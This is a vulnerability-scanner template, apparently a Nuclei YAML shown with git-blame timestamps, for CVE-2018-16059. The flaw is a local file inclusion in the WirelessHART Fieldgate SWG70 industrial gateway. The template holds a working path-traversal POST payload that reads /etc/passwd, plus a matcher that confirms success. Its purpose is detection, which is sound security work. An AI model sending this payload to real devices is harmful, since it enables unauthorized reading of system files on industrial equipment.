2021-07-19 10:16:19 +00:00
id : CVE-2018-16059
info :
2022-07-26 13:45:11 +00:00
name : WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion
2021-07-19 10:16:19 +00:00
author : daffainfo
2021-07-19 18:45:32 +00:00
severity : medium
2022-07-26 13:45:11 +00:00
description : WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system, potentially leading to unauthorized access or information disclosure.
2023-09-06 12:57:14 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in WirelessHART Fieldgate SWG70 3.0.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://www.exploit-db.com/exploits/45342
2022-05-17 09:18:12 +00:00
- https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
2022-07-26 13:58:43 +00:00
- https://www.exploit-db.com/exploits/45342/
2023-07-15 16:29:17 +00:00
- https://cert.vde.com/en-us/advisories/vde-2019-002
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-16059
cwe-id : CWE-22
2024-01-29 17:11:14 +00:00
epss-score : 0.34793
epss-percentile : 0.96722
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : endress
product : wirelesshart_fieldgate_swg70_firmware
2023-12-05 09:50:33 +00:00
tags : cve,cve2018,iot,lfi,edb,endress
2021-07-19 10:16:19 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-19 10:16:19 +00:00
- method : POST
path :
- "{{BaseURL}}/fcgi-bin/wgsetcgi"
2023-07-11 19:49:27 +00:00
2021-07-19 10:16:19 +00:00
body : 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand'
matchers-condition : and
matchers :
- type : regex
2023-07-11 19:49:27 +00:00
part : body
2021-07-19 10:16:19 +00:00
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-19 10:16:19 +00:00
- type : status
status :
- 200
2024-01-30 06:46:18 +00:00
# digest: 4b0a0048304602210093eca11ebab690b724707e5d3854aad6efded48da439964a5bdbe285945eaf020221009d01df33ad6fd8af8c4ba896f1dfea396a51ea797cb4c6d1196b1f0e9cad623f:922c64590222798bb761d5b6d8e72950